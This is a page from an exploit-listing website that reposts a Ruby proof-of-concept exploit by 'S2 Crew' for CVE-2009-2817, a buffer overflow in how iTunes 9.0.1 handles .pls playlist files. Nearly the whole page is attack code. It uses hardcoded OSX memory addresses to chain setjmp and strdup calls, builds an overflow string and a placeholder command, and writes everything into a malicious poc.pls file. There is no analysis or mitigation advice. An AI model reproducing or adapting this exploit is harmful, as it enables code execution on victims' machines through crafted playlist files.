Home » Exploits » iTunes 9.0.1 .pls file handling buffer overflow iTunes 9.0.1 .pls file handling buffer overflow Feeds - Exploits Written by S2 Crew    Sunday, 21 February 2010 11:13 # Exploit Title: iTunes .pls file handling buffer overflow # Date: 2009.12.20 # Author: S2 Crew [Hungary] # Software Link: - # Version: 9.0 # Tested on: OSX 10.5.8, Windows XP SP2 (/GS flag, DOS) # CVE: CVE-2009-2817 # Code: #!/usr/bin/env ruby SETJMP = 0x92F04224 JMP_BUF = 0x8fe31290 STRDUP = 0x92EED110 # 8fe24459 jmp *%eax JMP_EAX = 0x8fe24459 def make_exec_payload_from_heap_stub() frag0 = "\x90" + # nop "\x58" + # pop eax "\x61" + # popa "\xc3" # ret frag1 = "\x90" + # nop "\x58" + # pop eax "\x89\xe0" + # mov eax, esp "\x83\xc0\x0c" + # add eax, byte +0xc "\x89\x44\x24\x08" + # mov [esp+0x8], eax "\xc3" # ret exec_payload_from_heap_stub = frag0 + [SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") + frag1 + "X" * 20 + [SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP, JMP_EAX].pack("V5") + "X" * 4 end payload_cmd = "hereisthetrick" stub = make_exec_payload_from_heap_stub() ext = "A" * 59 stub = make_exec_payload_from_heap_stub() exploit = ext + stub + payload_cmd # pls file format file = "[playlist]\n" file += "NumberOfEntries=1\n" file += "File1=http://1/asdf." + exploit + "\n" file += "Title1=asdf\n" file += "Length1=100\n" file += "Version=2" + '\n' File.open('poc.pls','w') do |f| f.puts file f.close end

Security Services by HSC Contact us Become partner Advertise with us Join our staff